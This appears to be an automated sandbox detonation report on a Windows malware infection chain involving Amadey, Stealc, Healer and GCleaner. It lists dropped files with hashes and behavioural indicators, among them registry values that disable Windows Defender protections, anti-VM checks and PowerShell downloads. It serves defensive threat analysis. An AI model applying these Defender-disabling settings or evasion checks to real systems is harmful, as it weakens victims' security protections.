| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
C:\ProgramData\AECAKJJECAEGCBGDHDHC
| MD5 | a9918890a977de0320728f6d286286a7 |
| SHA1 | a046d676fe3c73dac82d634e52515128837075b9 |
| SHA256 | f06c988fc8fd4ea31704459fbe489a2b41cce322c0040037371234d323415652 |
| SHA512 | 0b70d9a9c0f5ba9ad91e394addb0ae3ae7fbd09c15c4c73e9d7e70472961c93e09e4325d4f5b19638f3943c0eb21948c54fa31a02d4aabece99fdcb3574ef947 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\Tar63F.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
memory/1712-1132-0x0000000000E20000-0x000000000151E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10110390101\65198a42c7.exe
| MD5 | fe00a5ac6c9fc6a27f047668019d1937 |
| SHA1 | d8ae38a46abb08da70c9e6a57697d6b5f26bc4f1 |
| SHA256 | d766bf1b66d2614cc48fdfccedcc4dfcb92a31094a1b90122801ed70e8844b2a |
| SHA512 | ba767d0d0c8ae18c445d500a810909c78895883b4c07eaf6399f69ae3aa0abb371f67b404fea37796e5b2ad3a4602316fce716a7c8e709f7654144ed59b77dc1 |
C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE
| MD5 | fe089eca3b83b1994578132a6fca1baf |
| SHA1 | 3af85c058f9db79b1f15ec21991a37428d49d59c |
| SHA256 | 9619b104fc44c027f5afc9ebeb8767820136ef80f68b7e7dc633fb332c7e9e7b |
| SHA512 | 3e42d3e50b33ef7261a7c2220b9db4f88cd5d85e05d4d17c5bac6a6d937ded55c536152efe5002cf2f4d18e70b749789d9ce4cd97fa41195ad26aeceb0354ff4 |
C:\Users\Admin\AppData\Local\Temp\10110400121\am_no.cmd
| MD5 | cedac8d9ac1fbd8d4cfc76ebe20d37f9 |
| SHA1 | b0db8b540841091f32a91fd8b7abcd81d9632802 |
| SHA256 | 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b |
| SHA512 | ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\shared_proto_db\000016.dbtmp
| MD5 | edd71dd3bade6cd69ff623e1ccf7012d |
| SHA1 | ead82c5dd1d2025d4cd81ea0c859414fbd136c8d |
| SHA256 | befea596b4676ccf7cc37ea8048044bfa0556c8931d76fdeeb693d20264e50d6 |
| SHA512 | 7fa9b9ef95db0ce461de821f0dec1be8147095680b7879bad3c5752692294f94ebc202b85577b5abac9aeaf48371595dd61792786a43c0bd9b36c9fc3752669d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\shared_proto_db\metadata\000017.dbtmp
| MD5 | d8c7ce61e1a213429b1f937cae0f9d7c |
| SHA1 | 19bc3b7edcd81eace8bff4aa104720963d983341 |
| SHA256 | 7d3d7c3b6e16591b894a5ce28f255cb136bb6c45f5038c3b120b44b413082e35 |
| SHA512 | ffc1854cccbd5a5c1740df9d3ba48994d48ef9a585bd513f00371c68086629d45ee293336af0f27ff350614f68ee660890920773f9ebdf1c327f20a620860a15 |
memory/2576-1253-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SV0CHHFUI4BR4Q8OWTZC.temp
| MD5 | 5a80620bbcd12c76ca9cd8e1c02ea6c5 |
| SHA1 | 58e1deb515f5f3d981df7b5773bc0f1b051ca53f |
| SHA256 | 18039e54bfb87c6a43c8ac99abca3f295239e6cacd730df44fded9520ebe0d7a |
| SHA512 | 81f8a6d8468142698740b105731b87ba9c9b99ec5362df686f2302d29eb52c3047ce761339267653850ea234977c4cfb93339c9b16936bd80f7c2b3d8f994b01 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000014.dbtmp
| MD5 | ebc863bd1c035289fe8190da28b400bc |
| SHA1 | 1e63d5bda5f389ce1692da89776e8a51fa12be13 |
| SHA256 | 61657118abc562d70c10cbea1e8c92fab3a92739f5445033e813c3511688c625 |
| SHA512 | f21506feeed984486121a09c1d43d4825ec1ec87f8977fa8c9cd4ff7fe15a49f74dc1b874293409bd309006c7bbc81e1c4bcba8d297c5875ca009b02e6d2b7be |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Sync Data\LevelDB\000015.dbtmp
| MD5 | d1625ab188e7c8f2838b317ba36efc69 |
| SHA1 | 9352ce60916471b427e9f6d8f192ae2cd9c1ecdb |
| SHA256 | f6a28e2e41d451b4de8597a14916d7a3058ebdd8046a89109658321142660d69 |
| SHA512 | 50bf78dece37f946a6229d81cb61f0cc647b78220205ebd7f265582e6b228666c6229c219c480556257a135ef5f26600a497dc66494b40779c71ec62a2fb5e42 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Extension Scripts\000019.dbtmp
| MD5 | e5ad213c1d147e06198eec1980e7d918 |
| SHA1 | 8169b54541b0613052e7dfbdb27ded2d89c26632 |
| SHA256 | 300feb3870e7d5e43b28bd6b7826d9e0c21e0e81ac1b44e9c4e35957ad0fa023 |
| SHA512 | 326fa42ae471094fcddb19198fead059669f457b81aa462d93c83df47102c664bd6d4c83f069c0da06450e971ee62efe8d22a2db5aaff356a2a5591455dfd8ec |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\shared_proto_db\metadata\000020.dbtmp
| MD5 | a874f3e3462932a0c15ed8f780124fc5 |
| SHA1 | 966f837f42bca5cac2357cff705b83d68245a2c2 |
| SHA256 | 01bd196d6a114691ec642082ebf6591765c0168d4098a0cd834869bd11c8b87d |
| SHA512 | 382716d6fc0791ca0ccfa1efba318cff92532e04038e9b9aa4c27447ac2cac26c79da8ee7dbafae63278df240f0a8cab5efea2ee34eef2e54e884784147e6d00 |
C:\Users\Admin\AppData\Local\Temp\10110500101\8ce1456568.exe
| MD5 | e7b0c4c8f5ae60095b01cf01aba7810a |
| SHA1 | 1b3057d010d99d7630c5fffa933ee98420a809c5 |
| SHA256 | 7e6fda01791cdbd22d3352856d42d7e61ae76d365df0071bc57cf39ea0517885 |
| SHA512 | c57e12f095b367bf43a1c2ded9b15120a320ebe1d7d845165e82557adb7e5f567f5b039d388b01f94bcb270acbccfd5c65c12949a1f1e90ed53206bfc76847c6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Browser
| MD5 | de9ef0c5bcc012a3a1131988dee272d8 |
| SHA1 | fa9ccbdc969ac9e1474fce773234b28d50951cd8 |
| SHA256 | 3615498fbef408a96bf30e01c318dac2d5451b054998119080e7faac5995f590 |
| SHA512 | cea946ebeadfe6be65e33edff6c68953a84ec2e2410884e12f406cac1e6c8a0793180433a7ef7ce097b24ea78a1fdbb4e3b3d9cdf1a827ab6ff5605da3691724 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\814ff061-5def-4881-a644-f1d5c55182b2.tmp
| MD5 | 3e1f2d88d4e99ca91ada15df1bf1736f |
| SHA1 | 9a0554feb916e839798ab445d8d9ff5b09b2412a |
| SHA256 | 6707f722786f8e43581bdedc4f12c02a622b45720fcd46703aa2f0887d44a718 |
| SHA512 | f12bb356b9e736105fd30801bdae8a2a51eaf11512bd31ce195d2e02fb3442afa97acde812446199dcfbeae05981d94e4f13c1346ae7cf1c1bb5c4b8a01eb1ae |
C:\Users\Admin\AppData\Local\Temp\10110510101\9bcb2b34db.exe
| MD5 | 7ebfd3c200d1cef79141205b2232d04e |
| SHA1 | 9507b4780dc90ac98995ab6987cb76cc3e85cf3d |
| SHA256 | ee097a32ba863725396bd41b54d0dc023d1a15e7e619cd009e93047e4c95be38 |
| SHA512 | 17cae57fb8194b470e8abc3a5072b2f63a119e10dfc6b44456123f4493632b01bb1e80d15121f63f0dc48c5050c90109c1d17c6ffccd470c11d1e8f36874b73f |
C:\ProgramData\freebl3.dll
| MD5 | 550686c0ee48c386dfcb40199bd076ac |
| SHA1 | ee5134da4d3efcb466081fb6197be5e12a5b22ab |
| SHA256 | edd043f2005dbd5902fc421eabb9472a7266950c5cbaca34e2d590b17d12f5fa |
| SHA512 | 0b7f47af883b99f9fbdc08020446b58f2f3fa55292fd9bc78fc967dd35bdd8bd549802722de37668cc89ede61b20359190efbfdf026ae2bdc854f4740a54649e |
C:\ProgramData\msvcp140.dll
| MD5 | 5ff1fca37c466d6723ec67be93b51442 |
| SHA1 | 34cc4e158092083b13d67d6d2bc9e57b798a303b |
| SHA256 | 5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062 |
| SHA512 | 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546 |
C:\Users\Admin\AppData\Local\Temp\10110520101\926589aff2.exe
| MD5 | c83ea72877981be2d651f27b0b56efec |
| SHA1 | 8d79c3cd3d04165b5cd5c43d6f628359940709a7 |
| SHA256 | 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482 |
| SHA512 | d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0 |
memory/608-1550-0x00000000011E0000-0x0000000001258000-memory.dmp
C:\ProgramData\softokn3.dll
| MD5 | 4e52d739c324db8225bd9ab2695f262f |
| SHA1 | 71c3da43dc5a0d2a1941e874a6d015a071783889 |
| SHA256 | 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a |
| SHA512 | 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6 |
C:\ProgramData\vcruntime140.dll
| MD5 | a37ee36b536409056a86f50e67777dd7 |
| SHA1 | 1cafa159292aa736fc595fc04e16325b27cd6750 |
| SHA256 | 8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825 |
| SHA512 | 3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356 |
C:\Users\Admin\AppData\Local\Temp\10110530101\19001abe36.exe
| MD5 | cc1a40ae718a316ece1fa40898297c32 |
| SHA1 | 1400b072dffc6b9300e48b35bbb8f9f9a93ae357 |
| SHA256 | 0f00394667da2e8756cbc43b414f053e2923b77198e7972710a4f643d3d9437c |
| SHA512 | af551538724552dc4699a82c8324c83c17187b13afa716de359e891ff2d66f9a5a00de817dc73294d635a2c71a49ee3374f91eae40c9730ec776c8c1907bd5bd |
C:\Users\Admin\AppData\Local\Temp\10110540101\d6fa193726.exe
| MD5 | ecbd88e7bb854e4ce89e94f5e76d0116 |
| SHA1 | 2a2415f6db7d9bf6ec445cadd57d0ef7cd8e66fd |
| SHA256 | c2dbaaa27274e1b7eab4c2d13dff48715ae8afc54201b2d469f6fca8364f5684 |
| SHA512 | cf477fdd53d86ffa90d5529f80fb4f70dac75b5c486ffca7a2be614a6be93de21a293ad24a7ccb3cf8729dcebd64105c25b4cf2db1a0704a7ef36bb1a52a3020 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7ZQSKFIX\service[1].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\shared_proto_db\metadata\000023.dbtmp
| MD5 | 2091e7af40368b8a9183a08a62efc8f9 |
| SHA1 | c552e8726cfab57eeb03d5e176cedd0771382530 |
| SHA256 | 368b5cdab2ff128767296bb4f19bfcd39baa627eaaf43cafba54fc223feec47f |
| SHA512 | c4d0d89ab6ca7ed48f10c8bc3211a3a1a8776a54ff58bf79940921d6e1b06fdccb9b593ac8d4b7cc2cb80f320f72cbd3104fe2ed67b1462b9d59356c75b4b4e6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Extension Scripts\000022.dbtmp
| MD5 | 6671db8c02f3c234bc5b756619a0ed77 |
| SHA1 | ff451a14cdd61df48cce4448f118377af77da143 |
| SHA256 | f7858098c26ef2a143b0e7cafbc03040c3c1c3185f446517108a7bdd2a6d9c4d |
| SHA512 | 1c6182196ec6086d5316c741f974e6ec4efcedc3eb835ade8df2762d2ff245f055c05ed95e06fea3e04fe3a08e9582846cf2588c31fd69fc4978440039604ba1 |
C:\ProgramData\C5AD1DF3C7BF0C79.dat
| MD5 | d367ddfda80fdcf578726bc3b0bc3e3c |
| SHA1 | 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671 |
| SHA256 | 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0 |
| SHA512 | 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77 |
C:\Users\Admin\AppData\Local\Temp\10110550101\ff5f2c6bdb.exe
| MD5 | bd75bba4bc3b2a15f3734d37ede02fe3 |
| SHA1 | 431b6edb8be09f0717183731f48e7d7913121c93 |
| SHA256 | 0c0dff4b73407a6055a405e8c96ec37eda7d7aab146e9b6f8273f2f1ec80437b |
| SHA512 | 523b2fd737d613dce5d8033707b9e7d3d00c2a3fce513660cd4217f7b297c0d6ad1b7faebef4a6fccccd8a3244307d1c2f7507b4167691848d1b50b08a611273 |
C:\Users\Admin\AppData\Local\Temp\10110560101\4845565179.exe
| MD5 | 44222189950020de11889bb788149def |
| SHA1 | 95ef31887ab31e7ac6713a4652d6c1a110d81e44 |
| SHA256 | 4e47387c8a0f00ecbeabeb9723822378e5d6c2583b5469ec031cfe55ace5fbb9 |
| SHA512 | ec1408190ce939ed8043cd2bd462d3ea3ec551523c101f8b67be0c1fce4db2c52f3f41f2e0a77e62d1e31af393147473c9d8ea884e2e5c1bec51327905f730fe |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Extension Scripts\000025.dbtmp
| MD5 | 20558702f92f2b0ebef7726830fe9d9f |
| SHA1 | afc84aedb33d5342e2d0e9873293b846d3ff5c33 |
| SHA256 | 0d13868aecf007c9c949ef1e6bb7106686cd4f449c92cf1ebcdca54db7b24b33 |
| SHA512 | 67e023324bd327d0d065d4254e3a67bc8c233bf2db9384231318effee5125fe47ef46235c14a2246b4fbdcad992a3060ea394e16023265b4828d86cf1d119780 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\shared_proto_db\metadata\000026.dbtmp
| MD5 | 509013020cd5cf3f4edb5ca4560e8300 |
| SHA1 | 43c9c51700a273d818e7332421203541697cba4c |
| SHA256 | 765840776810ca47da891b5f31a5cc323d27d1a41d3a4e32f1cd7126a95c0361 |
| SHA512 | 25761de615ce7296906f0513fcfaee3d09a76885180b8fe0c0a12d265ab9576ff78cea2e2c36b13dba225b57cedcd82013c844eaab7489cc447f620eff23eb46 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Local Storage\leveldb\CURRENT
| MD5 | 904754a73eb4f8a75410a92b2b7a920c |
| SHA1 | 208f9e70a93742e8ca1f5e2537690172971209be |
| SHA256 | c3225bb8babf9823a2daf2bccae0cafc5d3e0857c5f24187dc004f1b2560b4db |
| SHA512 | cb251f3f6679b9f339c3697f64ed056ae53caf22aedbf37fb57dfe47e8c0e95f295cb180c342e415bc540a9332c0aa9253af7fd2ac17b3e80ad94bcf2cf29469 |
C:\Users\Admin\AppData\Local\Temp\10110570101\23443213b9.exe
| MD5 | de9fdda5de6c4dfaffb86be4ee98d70a |
| SHA1 | c0c4a6ae8003f5508c92c8bbb037c49fff06a5c3 |
| SHA256 | 952b6fb34399b787bae14c027165482d38c5355e16d6f1d9f84fa62e6c7c6c92 |
| SHA512 | 74e44c48e92b0f4ad763dbed41b9252072e0ad27dfef651460fd1500fdfc11ef164853aabb056a71b0d4df01975efd8bfd111565a80ad79b441ab544b1c14592 |
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-06 05:22
Reported
2025-03-06 05:25
Platform
win10v2004-20250217-en
Max time kernel
145s
Max time network
149s
Command Line
Signatures
Amadey
Amadey family
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
Stealc
Stealc family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe | N/A |
